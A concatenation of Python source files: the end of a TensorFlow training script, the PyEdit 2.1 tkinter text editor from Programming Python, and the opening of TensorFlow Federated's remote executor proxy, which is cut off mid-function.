saved = saver.save(sess_train, save_path)
print('Variables saved in file: %s' % saved)
coord.request_stop()
|
_nonunicode-textEditor.py
|
"""
################################################################################
PyEdit 2.1: a Python/tkinter text file editor and component.
Uses the Tk text widget, plus GuiMaker menus and toolbar buttons to
implement a full-featured text editor that can be run as a standalone
program, and attached as a component to other GUIs. Also used by
PyMailGUI and PyView to edit mail text and image file notes, and by
PyMailGUI and PyDemos in pop-up mode to display source and text files.
New in version 2.1:
-updated to run under Python 3.1
-added "grep" search menu option and dialog: threaded external files search
-update change and font dialog implementations to allow many to be open
-verify app exit on quit if changes in other edit windows in process
-runs self.update() before setting text in new editor for loadFirst
-use base name after chdir to run code file, not possibly relative path
-use launch modes that support arguments for run code file mode on Windows
-run code inherits launchmodes backslash conversion (no longer required)
New in version 2.0:
-added simple font components input dialog
-use Tk 8.4 undo stack API to add undo/redo text modifications
-now verifies on quit, open, new, run, only if text modified and unsaved
-searches are case-insensitive now by default
-configuration module for initial font/color/size/searchcase
TBD (and suggested exercises):
-could also allow search case choice in GUI (not just config file)
-could use re patterns for searches (see text chapter)
-could experiment with syntax-directed text colorization (see IDLE)
-could try to verify app exit for quit() in non-managed windows too?
-could queue each result as found in grep dialog thread to avoid delay
-could use images in toolbar buttons (per examples in Chapter 9)
Unicode TBD:
-could open input files in binary mode to better support viewing arbitrary
Unicode text, but Text content is returned as decoded str whether bytes or
str was inserted, so we'd need the encoding type to save or encode (see
Chapter 9); as is, clients can still read text as bytes from binary-mode
files before creating a texteditor and insert it manually, but file saves
may fail if the bytes viewed cannot be encoded per the platform default;
probably, we need to expect an encoding name to be passed in, or ask the
user for the encoding if the platform default and common guesses fail;
################################################################################
"""
Version = '2.1'
import sys, os # platform, args, run tools
from tkinter import * # base widgets, constants
from tkinter.filedialog import Open, SaveAs # standard dialogs
from tkinter.messagebox import showinfo, showerror, askyesno
from tkinter.simpledialog import askstring, askinteger
from tkinter.colorchooser import askcolor
from PP4E.Gui.Tools.guimaker import * # Frame + menu/toolbar builders
try:
import textConfig # startup font and colors
configs = textConfig.__dict__ # work if not on the path or bad
except:
configs = {}
helptext = """PyEdit version %s
April, 2010
(2.0: January, 2006)
(1.0: October, 2000)
Programming Python, 4th Edition
O'Reilly Media, Inc.
A text editor program and embeddable object
component, written in Python/tkinter. Use
menu tear-offs and toolbar for quick access
to actions, and Alt-key shortcuts for menus.
Additions in version %s:
- supports Python 3.X
- grep external files search dialog
- allow multiple change and font dialogs
- verify app quit if other edit windows changed
Prior version additions:
- font pick dialog
- unlimited undo/redo
- quit/open/new/run prompt save only if changed
- searches are case-insensitive
- startup configuration module textConfig.py
"""
START = '1.0' # index of first char: row=1,col=0
SEL_FIRST = SEL + '.first' # map sel tag to index
SEL_LAST = SEL + '.last' # same as 'sel.last'
FontScale = 0 # use bigger font on Linux
if sys.platform[:3] != 'win': # and other non-Windows boxes
FontScale = 3
################################################################################
# Main class: implements editor GUI, actions
# requires a flavor of GuiMaker to be mixed in by mode specific subclasses;
# not a direct subclass of GuiMaker because that comes in multiple forms.
################################################################################
class TextEditor: # mix with menu/toolbar Frame class
startfiledir = '.' # for dialogs
editwindows = [] # for process-wide quit check
ftypes = [('All files', '*'), # for file open dialog
('Text files', '.txt'), # customize in subclass
('Python files', '.py')] # or set in each instance
colors = [{'fg':'black', 'bg':'white'}, # color pick list
{'fg':'yellow', 'bg':'black'}, # first item is default
{'fg':'white', 'bg':'blue'}, # tailor me as desired
{'fg':'black', 'bg':'beige'}, # or do PickBg/Fg chooser
{'fg':'yellow', 'bg':'purple'},
{'fg':'black', 'bg':'brown'},
{'fg':'lightgreen', 'bg':'darkgreen'},
{'fg':'darkblue', 'bg':'orange'},
{'fg':'orange', 'bg':'darkblue'}]
fonts = [('courier', 9+FontScale, 'normal'), # platform-neutral fonts
('courier', 12+FontScale, 'normal'), # (family, size, style)
('courier', 10+FontScale, 'bold'), # or pop up a listbox
('courier', 10+FontScale, 'italic'), # make bigger on Linux
('times', 10+FontScale, 'normal'), # use 'bold italic' for 2
('helvetica', 10+FontScale, 'normal'), # also 'underline', etc.
('ariel', 10+FontScale, 'normal'),
('system', 10+FontScale, 'normal'),
('courier', 20+FontScale, 'normal')]
def __init__(self, loadFirst=''):
if not isinstance(self, GuiMaker):
raise TypeError('TextEditor needs a GuiMaker mixin')
self.setFileName(None)
self.lastfind = None
self.openDialog = None
self.saveDialog = None
self.text.focus() # else must click in text
if loadFirst:
self.update() # 2.1: else @ line 2; see book
self.onOpen(loadFirst)
def start(self): # run by GuiMaker.__init__
self.menuBar = [ # configure menu/toolbar
('File', 0, # a GuiMaker menu def tree
[('Open...', 0, self.onOpen), # build in method for self
('Save', 0, self.onSave), # label, shortcut, callback
('Save As...', 5, self.onSaveAs),
('New', 0, self.onNew),
'separator',
('Quit...', 0, self.onQuit)]
),
('Edit', 0,
[('Undo', 0, self.onUndo),
('Redo', 0, self.onRedo),
'separator',
('Cut', 0, self.onCut),
('Copy', 1, self.onCopy),
('Paste', 0, self.onPaste),
'separator',
('Delete', 0, self.onDelete),
('Select All', 0, self.onSelectAll)]
),
('Search', 0,
[('Goto...', 0, self.onGoto),
('Find...', 0, self.onFind),
('Refind', 0, self.onRefind),
('Change...', 0, self.onChange),
('Grep...', 3, self.onGrep)]
),
('Tools', 0,
[('Pick Font...', 6, self.onPickFont),
('Font List', 0, self.onFontList),
'separator',
('Pick Bg...', 3, self.onPickBg),
('Pick Fg...', 0, self.onPickFg),
('Color List', 0, self.onColorList),
'separator',
('Info...', 0, self.onInfo),
('Clone', 1, self.onClone),
('Run Code', 0, self.onRunCode)]
)]
self.toolBar = [
('Save', self.onSave, {'side': LEFT}),
('Cut', self.onCut, {'side': LEFT}),
('Copy', self.onCopy, {'side': LEFT}),
('Paste', self.onPaste, {'side': LEFT}),
('Find', self.onRefind, {'side': LEFT}),
('Help', self.help, {'side': RIGHT}),
('Quit', self.onQuit, {'side': RIGHT})]
def makeWidgets(self): # run by GuiMaker.__init__
name = Label(self, bg='black', fg='white') # add below menu, above tool
name.pack(side=TOP, fill=X) # menu/toolbars are packed
# GuiMaker frame packs itself
vbar = Scrollbar(self)
hbar = Scrollbar(self, orient='horizontal')
text = Text(self, padx=5, wrap='none') # disable line wrapping
text.config(undo=1, autoseparators=1) # 2.0, default is 0, 1
vbar.pack(side=RIGHT, fill=Y)
hbar.pack(side=BOTTOM, fill=X) # pack text last
text.pack(side=TOP, fill=BOTH, expand=YES) # else sbars clipped
text.config(yscrollcommand=vbar.set) # call vbar.set on text move
text.config(xscrollcommand=hbar.set)
vbar.config(command=text.yview) # call text.yview on scroll move
hbar.config(command=text.xview) # or hbar['command']=text.xview
# 2.0: apply user configs or defaults
startfont = configs.get('font', self.fonts[0])
startbg = configs.get('bg', self.colors[0]['bg'])
startfg = configs.get('fg', self.colors[0]['fg'])
text.config(font=startfont, bg=startbg, fg=startfg)
if 'height' in configs: text.config(height=configs['height'])
if 'width' in configs: text.config(width =configs['width'])
self.text = text
self.filelabel = name
############################################################################
# File menu commands
############################################################################
def my_askopenfilename(self): # objects remember last result dir/file
if not self.openDialog:
self.openDialog = Open(initialdir=self.startfiledir,
filetypes=self.ftypes)
return self.openDialog.show()
def my_asksaveasfilename(self): # objects remember last result dir/file
if not self.saveDialog:
self.saveDialog = SaveAs(initialdir=self.startfiledir,
filetypes=self.ftypes)
return self.saveDialog.show()
def onOpen(self, loadFirst=''):
doit = (not self.text_edit_modified() or # 2.0
askyesno('PyEdit', 'Text has changed: discard changes?'))
if doit:
file = loadFirst or self.my_askopenfilename()
if file:
try:
text = open(file, 'r').read()
except:
showerror('PyEdit', 'Could not open file ' + file)
else:
self.setAllText(text)
self.setFileName(file)
self.text.edit_reset() # 2.0: clear undo/redo stks
self.text.edit_modified(0) # 2.0: clear modified flag
def onSave(self):
self.onSaveAs(self.currfile) # may be None
def onSaveAs(self, forcefile=None):
file = forcefile or self.my_asksaveasfilename()
if file:
text = self.getAllText()
try:
open(file, 'w').write(text)
except:
showerror('PyEdit', 'Could not write file ' + file)
else:
self.setFileName(file) # may be newly created
self.text.edit_modified(0) # 2.0: clear modified flag
# don't clear undo/redo stks
def onNew(self):
doit = (not self.text_edit_modified() or # 2.0
askyesno('PyEdit', 'Text has changed: discard changes?'))
if doit:
self.setFileName(None)
self.clearAllText()
self.text.edit_reset() # 2.0: clear undo/redo stks
self.text.edit_modified(0) # 2.0: clear modified flag
def onQuit(self):
"""
on Quit menu/toolbar select and wm border X button in toplevel windows;
2.1: don't exit app if others changed; 2.0: don't ask if self unchanged;
moved to the top-level window classes at the end since may vary per usage:
a Quit in GUI might quit() to exit, destroy() just one Toplevel, Tk, or
edit frame, or not be provided at all when run as an attached component;
check self for changes, and if might quit(), main windows should check
other windows in the process-wide list to see if they have changed too;
"""
        assert False, 'onQuit must be defined in window-specific subclass'
def text_edit_modified(self):
"""
2.1: this now works! seems to have been a bool result type issue in tkinter;
2.0: self.text.edit_modified() broken in Python 2.4: do manually for now;
"""
return self.text.edit_modified()
#return self.tk.call((self.text._w, 'edit') + ('modified', None))
############################################################################
# Edit menu commands
############################################################################
def onUndo(self): # 2.0
try: # tk8.4 keeps undo/redo stacks
self.text.edit_undo() # exception if stacks empty
except TclError: # menu tear-offs for quick undo
showinfo('PyEdit', 'Nothing to undo')
def onRedo(self): # 2.0: redo an undone
try:
self.text.edit_redo()
except TclError:
showinfo('PyEdit', 'Nothing to redo')
def onCopy(self): # get text selected by mouse, etc.
if not self.text.tag_ranges(SEL): # save in cross-app clipboard
showerror('PyEdit', 'No text selected')
else:
text = self.text.get(SEL_FIRST, SEL_LAST)
self.clipboard_clear()
self.clipboard_append(text)
def onDelete(self): # delete selected text, no save
if not self.text.tag_ranges(SEL):
showerror('PyEdit', 'No text selected')
else:
self.text.delete(SEL_FIRST, SEL_LAST)
def onCut(self):
if not self.text.tag_ranges(SEL):
showerror('PyEdit', 'No text selected')
else:
self.onCopy() # save and delete selected text
self.onDelete()
def onPaste(self):
try:
text = self.selection_get(selection='CLIPBOARD')
except TclError:
showerror('PyEdit', 'Nothing to paste')
return
self.text.insert(INSERT, text) # add at current insert cursor
self.text.tag_remove(SEL, '1.0', END)
self.text.tag_add(SEL, INSERT+'-%dc' % len(text), INSERT)
self.text.see(INSERT) # select it, so it can be cut
def onSelectAll(self):
self.text.tag_add(SEL, '1.0', END+'-1c') # select entire text
self.text.mark_set(INSERT, '1.0') # move insert point to top
self.text.see(INSERT) # scroll to top
############################################################################
# Search menu commands
############################################################################
def onGoto(self, forceline=None):
line = forceline or askinteger('PyEdit', 'Enter line number')
self.text.update()
self.text.focus()
if line is not None:
maxindex = self.text.index(END+'-1c')
maxline = int(maxindex.split('.')[0])
if line > 0 and line <= maxline:
self.text.mark_set(INSERT, '%d.0' % line) # goto line
self.text.tag_remove(SEL, '1.0', END) # delete selects
self.text.tag_add(SEL, INSERT, 'insert + 1l') # select line
self.text.see(INSERT) # scroll to line
else:
showerror('PyEdit', 'Bad line number')
def onFind(self, lastkey=None):
key = lastkey or askstring('PyEdit', 'Enter search string')
self.text.update()
self.text.focus()
self.lastfind = key
if key: # 2.0: nocase
nocase = configs.get('caseinsens', True) # 2.0: config
where = self.text.search(key, INSERT, END, nocase=nocase)
if not where: # don't wrap
showerror('PyEdit', 'String not found')
else:
pastkey = where + '+%dc' % len(key) # index past key
self.text.tag_remove(SEL, '1.0', END) # remove any sel
self.text.tag_add(SEL, where, pastkey) # select key
self.text.mark_set(INSERT, pastkey) # for next find
self.text.see(where) # scroll display
def onRefind(self):
self.onFind(self.lastfind)
def onChange(self):
"""
non-modal find/change dialog
2.1: pass per-dialog inputs to callbacks, may be > 1 change dialog open
"""
new = Toplevel(self)
new.title('PyEdit - change')
Label(new, text='Find text?', relief=RIDGE, width=15).grid(row=0, column=0)
Label(new, text='Change to?', relief=RIDGE, width=15).grid(row=1, column=0)
entry1 = Entry(new)
entry2 = Entry(new)
entry1.grid(row=0, column=1, sticky=EW)
entry2.grid(row=1, column=1, sticky=EW)
def onFind(): # use my entry in enclosing scope
self.onFind(entry1.get()) # runs normal find dialog callback
def onApply():
self.onDoChange(entry1.get(), entry2.get())
Button(new, text='Find', command=onFind ).grid(row=0, column=2, sticky=EW)
Button(new, text='Apply', command=onApply).grid(row=1, column=2, sticky=EW)
new.columnconfigure(1, weight=1) # expandable entries
def onDoChange(self, findtext, changeto):
# on Apply in change dialog: change and refind
if self.text.tag_ranges(SEL): # must find first
self.text.delete(SEL_FIRST, SEL_LAST)
self.text.insert(INSERT, changeto) # deletes if empty
self.text.see(INSERT)
self.onFind(findtext) # goto next appear
self.text.update() # force refresh
def onGrep(self):
"""
new in version 2.1: threaded external file search;
search matched filenames in directory tree for string;
listbox clicks open matched file at line of occurrence;
search is threaded so the GUI remains active and is not
blocked, and to allow multiple greps to overlap in time;
        could use threadtools, but avoid loop if no active grep;
"""
from PP4E.Gui.ShellGui.formrows import makeFormRow
        # nonmodal dialog: get dirname, filenamepatt, grepkey
popup = Toplevel()
popup.title('PyEdit - grep')
var1 = makeFormRow(popup, label='Directory root', width=18, browse=False)
var2 = makeFormRow(popup, label='Filename pattern', width=18, browse=False)
var3 = makeFormRow(popup, label='Search string', width=18, browse=False)
var1.set('.') # current dir
var2.set('*.py') # initial values
Button(popup, text='Go',
command=lambda: self.onDoGrep(var1.get(), var2.get(), var3.get())).pack()
def onDoGrep(self, dirname, filenamepatt, grepkey):
# on Go in grep dialog: populate scrolled list with matches
# tbd: should producer thread be daemon so dies with app?
import threading, queue
# make non-modal un-closeable dialog
mypopup = Tk()
mypopup.title('PyEdit - grepping')
status = Label(mypopup, text='Grep thread searching for: %r...' % grepkey)
status.pack(padx=20, pady=20)
mypopup.protocol('WM_DELETE_WINDOW', lambda: None) # ignore X close
# start producer thread, consumer loop
myqueue = queue.Queue()
threadargs = (filenamepatt, dirname, grepkey, myqueue)
threading.Thread(target=self.grepThreadProducer, args=threadargs).start()
self.grepThreadConsumer(grepkey, myqueue, mypopup)
def grepThreadProducer(self, filenamepatt, dirname, grepkey, myqueue):
"""
in a non-GUI parallel thread: queue find.find results list;
could also queue matches as found, but need to keep window;
"""
from PP4E.Tools.find import find
matches = []
for filepath in find(pattern=filenamepatt, startdir=dirname):
try:
for (linenum, linestr) in enumerate(open(filepath)):
if grepkey in linestr:
message = '%s@%d [%s]' % (filepath, linenum + 1, linestr)
matches.append(message)
except UnicodeDecodeError:
print('Unicode error in:', filepath)
myqueue.put(matches)
def grepThreadConsumer(self, grepkey, myqueue, mypopup):
"""
in the main GUI thread: watch queue for results or [];
there may be multiple active grep threads/loops/queues;
there may be other types of threads/checkers in process,
especially when PyEdit is attached component (PyMailGUI);
"""
import queue
try:
matches = myqueue.get(block=False)
except queue.Empty:
self.after(250, self.grepThreadConsumer, grepkey, myqueue, mypopup)
else:
mypopup.destroy() # close status
self.update() # erase it now
if not matches:
showinfo('PyEdit', 'Grep found no matches for: %r' % grepkey)
else:
self.grepMatchesList(matches, grepkey)
def grepMatchesList(self, matches, grepkey):
# populate list after successful matches
from PP4E.Gui.Tour.scrolledlist import ScrolledList
print('Matches for %s: %s' % (grepkey, len(matches)))
# catch list double-click
class ScrolledFilenames(ScrolledList):
def runCommand(self, selection):
file, line = selection.split(' [', 1)[0].split('@')
editor = TextEditorMainPopup(loadFirst=file, winTitle=' grep match')
editor.onGoto(int(line))
editor.text.focus_force() # no, really
        # new non-modal window
popup = Tk()
popup.title('PyEdit - grep matches: %r' % grepkey)
ScrolledFilenames(parent=popup, options=matches)
############################################################################
# Tools menu commands
############################################################################
def onFontList(self):
self.fonts.append(self.fonts[0]) # pick next font in list
del self.fonts[0] # resizes the text area
self.text.config(font=self.fonts[0])
def onColorList(self):
self.colors.append(self.colors[0]) # pick next color in list
del self.colors[0] # move current to end
self.text.config(fg=self.colors[0]['fg'], bg=self.colors[0]['bg'])
def onPickFg(self):
self.pickColor('fg') # added on 10/02/00
def onPickBg(self): # select arbitrary color
self.pickColor('bg') # in standard color dialog
def pickColor(self, part): # this is too easy
(triple, hexstr) = askcolor()
if hexstr:
self.text.config(**{part: hexstr})
def onInfo(self):
text = self.getAllText() # added on 5/3/00 in 15 mins
bytes = len(text) # words uses a simple guess:
lines = len(text.split('\n')) # any separated by whitespace
words = len(text.split()) # 3.x: bytes is really chars
index = self.text.index(INSERT) # str is unicode code points
where = tuple(index.split('.'))
showinfo('PyEdit Information',
'Current location:\n\n' +
'line:\t%s\ncolumn:\t%s\n\n' % where +
'File text statistics:\n\n' +
'chars:\t%d\nlines:\t%d\nwords:\t%d\n' % (bytes, lines, words))
def onClone(self):
"""
open a new edit window without changing one already open
inherits quit and other behavior of window that it clones
"""
new = Toplevel() # a new edit window in same process
myclass = self.__class__ # instance's (lowest) class object
myclass(new) # attach/run instance of my class
def onRunCode(self, parallelmode=True):
"""
run Python code being edited--not an IDE, but handy;
tries to run in file's dir, not cwd (may be PP4E root);
inputs and adds command-line arguments for script files;
code's stdin/out/err = editor's start window, if any:
run with a console window to see code's print outputs;
but parallelmode uses start to open a DOS box for I/O;
module search path will include '.' dir where started;
in non-file mode, code's Tk root may be PyEdit's window;
subprocess or multiprocessing modules may work here too;
2.1: fixed to use base file name after chdir, not path;
        2.1: use StartArgs to allow args in file mode on Windows;
"""
def askcmdargs():
return askstring('PyEdit', 'Commandline arguments?') or ''
from PP4E.launchmodes import System, Start, StartArgs, Fork
filemode = False
thefile = str(self.getFileName())
if os.path.exists(thefile):
filemode = askyesno('PyEdit', 'Run from file?')
if not filemode: # run text string
cmdargs = askcmdargs()
namespace = {'__name__': '__main__'} # run as top-level
sys.argv = [thefile] + cmdargs.split() # could use threads
exec(self.getAllText() + '\n', namespace) # exceptions ignored
elif self.text_edit_modified(): # 2.0: changed test
showerror('PyEdit', 'Text changed: save before run')
else:
cmdargs = askcmdargs()
mycwd = os.getcwd() # cwd may be root
dirname, filename = os.path.split(thefile) # get dir, base
os.chdir(dirname or mycwd) # cd for filenames
thecmd = filename + ' ' + cmdargs # 2.1: not theFile
if not parallelmode: # run as file
System(thecmd, thecmd)() # block editor
else:
if sys.platform[:3] == 'win': # spawn in parallel
run = StartArgs if cmdargs else Start # 2.1: support args
run(thecmd, thecmd)() # or always Spawn
else:
Fork(thecmd, thecmd)() # spawn in parallel
os.chdir(mycwd) # go back to my dir
def onPickFont(self):
"""
2.0 non-modal font spec dialog
2.1: pass per-dialog inputs to callback, may be > 1 font dialog open
"""
from PP4E.Gui.ShellGui.formrows import makeFormRow
popup = Toplevel(self)
popup.title('PyEdit - font')
var1 = makeFormRow(popup, label='Family', browse=False)
var2 = makeFormRow(popup, label='Size', browse=False)
var3 = makeFormRow(popup, label='Style', browse=False)
var1.set('courier')
var2.set('12') # suggested vals
var3.set('bold italic') # see pick list for valid inputs
Button(popup, text='Apply', command=
lambda: self.onDoFont(var1.get(), var2.get(), var3.get())).pack()
def onDoFont(self, family, size, style):
try:
self.text.config(font=(family, int(size), style))
except:
showerror('PyEdit', 'Bad font specification')
############################################################################
# Utilities, useful outside this class
############################################################################
def isEmpty(self):
return not self.getAllText()
def getAllText(self):
return self.text.get('1.0', END+'-1c') # extract text as a string
def setAllText(self, text):
self.text.delete('1.0', END) # store text string in widget
self.text.insert(END, text) # or '1.0'
self.text.mark_set(INSERT, '1.0') # move insert point to top
self.text.see(INSERT) # scroll to top, insert set
def clearAllText(self):
self.text.delete('1.0', END) # clear text in widget
def getFileName(self):
return self.currfile
def setFileName(self, name): # also: onGoto(linenum)
self.currfile = name # for save
self.filelabel.config(text=str(name))
def setBg(self, color):
self.text.config(bg=color) # to set manually from code
def setFg(self, color):
self.text.config(fg=color) # 'black', hexstring
def setFont(self, font):
self.text.config(font=font) # ('family', size, 'style')
def setHeight(self, lines): # default = 24h x 80w
        self.text.config(height=lines)       # may also be from textConfig.py
def setWidth(self, chars):
self.text.config(width=chars)
def clearModified(self):
self.text.edit_modified(0) # clear modified flag
def isModified(self):
return self.text_edit_modified() # changed since last reset?
def help(self):
showinfo('About PyEdit', helptext % ((Version,)*2))
################################################################################
# Ready-to-use editor classes
# mix in a GuiMaker Frame subclass which builds menu and toolbars
#
# these classes are common use cases, but other configurations are possible;
# call TextEditorMain().mainloop() to start PyEdit as a standalone program;
# redefine/extend onQuit in a subclass to catch exit or destroy (see PyView);
# caveat: could use windows.py for icons, but quit protocol is custom here.
################################################################################
# 2.1: on quit(), don't silently exit entire app if any other changed edit
# windows are open in the process - changes would be lost because all other
# windows are closed too, including multiple Tk editor parents; uses a list
# to keep track of all PyEdit window instances open in process; this may be
# too broad (if we destroy() instead of quit(), need only check children
# of parent being destroyed), but better to err on side of being too inclusive;
# onQuit moved here because varies per window type and is not present for all;
#
# assumes a TextEditorMainPopup is never a parent to other editor windows -
# Toplevel children are destroyed with their parents; this does not address
# closes outside the scope of PyEdit classes here (tkinter quit is available
# on every widget, and any widget type may be a Toplevel parent!); client is
# responsible for checking for editor content changes in all uncovered cases;
# note that tkinter's <Destroy> bind event won't help here, because its callback
# cannot run GUI operations such as text change tests and fetches - see the
# book and destroyer.py for more details on this event;
#
# when editor owns the window
#
class TextEditorMain(TextEditor, GuiMakerWindowMenu):
"""
main PyEdit windows that quit() to exit app on a Quit in GUI, and build
a menu on a window; parent may be default Tk, explicit Tk, or Toplevel:
parent must be a window, and probably should be a Tk so this isn't silently
    destroyed and closed with a parent; all main PyEdit windows check all other
PyEdit windows open in the process for changes on a Quit in the GUI, since
a quit() here will exit the entire app; the editor's frame need not occupy
entire window (may have other parts: see PyView), but its Quit ends program;
onQuit is run for Quit in toolbar or File menu, as well as window border X;
"""
def __init__(self, parent=None, loadFirst=''): # when fills whole window
GuiMaker.__init__(self, parent) # use main window menus
TextEditor.__init__(self, loadFirst) # GuiMaker frame packs self
self.master.title('PyEdit ' + Version) # title, wm X if standalone
self.master.iconname('PyEdit')
self.master.protocol('WM_DELETE_WINDOW', self.onQuit)
TextEditor.editwindows.append(self)
def onQuit(self): # on a Quit request in the GUI
close = not self.text_edit_modified() # check self, ask?, check others
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
windows = TextEditor.editwindows
changed = [w for w in windows if w != self and w.text_edit_modified()]
if not changed:
GuiMaker.quit(self) # quit ends entire app regardless of widget type
else:
numchange = len(changed)
verify = '%s other edit window%s changed: quit and discard anyhow?'
verify = verify % (numchange, 's' if numchange > 1 else '')
if askyesno('PyEdit', verify):
GuiMaker.quit(self)
class TextEditorMainPopup(TextEditor, GuiMakerWindowMenu):
"""
popup PyEdit windows that destroy() to close only self on a Quit in GUI,
and build a menu on a window; makes own Toplevel parent, which is child
to default Tk (for None) or other passed-in window or widget (e.g., a frame);
adds to list so will be checked for changes if any PyEdit main window quits;
if any PyEdit main windows will be created, parent of this should also be a
PyEdit main window's parent so this is not closed silently while being tracked;
onQuit is run for Quit in toolbar or File menu, as well as window border X;
"""
def __init__(self, parent=None, loadFirst='', winTitle=''):
self.popup = Toplevel(parent) # create own window
GuiMaker.__init__(self, self.popup) # use main window menus
TextEditor.__init__(self, loadFirst) # a frame in a new popup
assert self.master == self.popup
self.popup.title('PyEdit ' + Version + winTitle)
self.popup.iconname('PyEdit')
self.popup.protocol('WM_DELETE_WINDOW', self.onQuit)
TextEditor.editwindows.append(self)
def onQuit(self):
close = not self.text_edit_modified()
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
self.popup.destroy() # kill this window only
TextEditor.editwindows.remove(self) # (plus any child windows)
#
# when editor embedded in another window
#
class TextEditorComponent(TextEditor, GuiMakerFrameMenu):
"""
attached PyEdit component frames with full menu/toolbar options,
which run a destroy() on a Quit in the GUI to erase self only;
a Quit in the GUI verifies if any changes in self (only) here;
does not intercept window manager border X: doesn't own window;
does not add self to changes tracking list: part of larger app;
"""
def __init__(self, parent=None, loadFirst=''): # use Frame-based menus
GuiMaker.__init__(self, parent) # all menus, buttons on
TextEditor.__init__(self, loadFirst) # GuiMaker must init 1st
def onQuit(self):
close = not self.text_edit_modified()
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
self.destroy() # erase self Frame but do not quit enclosing app
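# Embedding sketch (hedged, not from the original book code): attach the editor as
# a component inside another Tk GUI; the host owns the window, and a Quit in the
# component only destroys the editor frame.
#
#     root = Tk()
#     ed = TextEditorComponent(root)
#     ed.pack(expand=YES, fill=BOTH)
#     ed.setAllText('hello from the host application')
#     root.mainloop()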
class TextEditorComponentMinimal(TextEditor, GuiMakerFrameMenu):
"""
attached PyEdit component frames without Quit and File menu options;
on startup, removes Quit from toolbar, and either deletes File menu
or disables all its items (possibly hackish, but sufficient); menu and
toolbar structures are per-instance data: changes do not impact others;
Quit in GUI never occurs, because it is removed from available options;
"""
def __init__(self, parent=None, loadFirst='', deleteFile=True):
self.deleteFile = deleteFile
GuiMaker.__init__(self, parent) # GuiMaker frame packs self
TextEditor.__init__(self, loadFirst) # TextEditor adds middle
def start(self):
TextEditor.start(self) # GuiMaker start call
for i in range(len(self.toolBar)): # delete quit in toolbar
if self.toolBar[i][0] == 'Quit': # delete file menu items,
del self.toolBar[i] # or just disable file
break
if self.deleteFile:
for i in range(len(self.menuBar)):
if self.menuBar[i][0] == 'File':
del self.menuBar[i]
break
else:
for (name, key, items) in self.menuBar:
if name == 'File':
items.append([1,2,3,4,6])
################################################################################
# standalone program run
################################################################################
def testPopup():
# see PyView and PyMail for component tests
root = Tk()
TextEditorMainPopup(root)
TextEditorMainPopup(root)
Button(root, text='More', command=TextEditorMainPopup).pack(fill=X)
Button(root, text='Quit', command=root.quit).pack(fill=X)
root.mainloop()
def main(): # may be typed or clicked
try: # or associated on Windows
fname = sys.argv[1] # arg = optional filename
except IndexError: # build in default Tk root
fname = None
TextEditorMain(loadFirst=fname).pack(expand=YES, fill=BOTH)
mainloop()
if __name__ == '__main__': # when run as a script
#testPopup()
main() # run .pyw for no DOS box
|
remote_executor.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import itertools
import queue
import threading
from typing import Mapping
import weakref
import absl.logging as logging
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import structure
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl.executors import execution_context
from tensorflow_federated.python.core.impl.executors import executor_base
from tensorflow_federated.python.core.impl.executors import executor_service_utils
from tensorflow_federated.python.core.impl.executors import executor_value_base
from tensorflow_federated.python.core.impl.types import placement_literals
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref: executor_pb2.ValueRef, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
# Clean up the value and the memory associated with it on the remote
# worker when no references to it remain.
def finalizer(value_ref, executor):
executor._dispose(value_ref) # pylint: disable=protected-access
weakref.finalize(self, finalizer, value_ref, executor)
@property
def type_signature(self):
return self._type_signature
@tracing.trace(span=True)
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._stub = stub
self._thread_pool_executor = thread_pool_executor
self._is_initialized = False
def _lazy_init(self):
"""Lazily initialize the underlying gRPC stream."""
if self._is_initialized:
return
logging.debug('Initializing bidi stream')
self._request_queue = queue.Queue()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
def request_iter():
"""Iterator that blocks on the request Queue."""
for seq in itertools.count():
logging.debug('Request thread: blocking for next request')
val = self._request_queue.get()
if val:
py_typecheck.check_type(val[0], executor_pb2.ExecuteRequest)
py_typecheck.check_type(val[1], threading.Event)
req = val[0]
req.sequence_number = seq
logging.debug(
'Request thread: processing request of type %s, seq_no %s',
val[0].WhichOneof('request'), seq)
self._response_event_dict[seq] = val[1]
yield val[0]
else:
logging.debug(
'Request thread: Final request received. Stream will close.')
# None means we are done processing
return
response_iter = self._stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('Response thread: blocking for next response')
for response in response_iter:
logging.debug(
'Response thread: processing response of type %s, seq_no %s',
response.WhichOneof('response'), response.sequence_number)
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except Exception as error: # pylint: disable=broad-except
logging.exception('Error calling remote executor: %s', error)
if _is_retryable_grpc_error(error):
logging.exception('gRPC error is retryable')
error = execution_context.RetryableError(error)
# Set all response events to errors. This is heavy-handed and
# potentially can be scaled back.
for _, response_event in self._response_event_dict.items():
if not response_event.isSet():
response_event.response = error
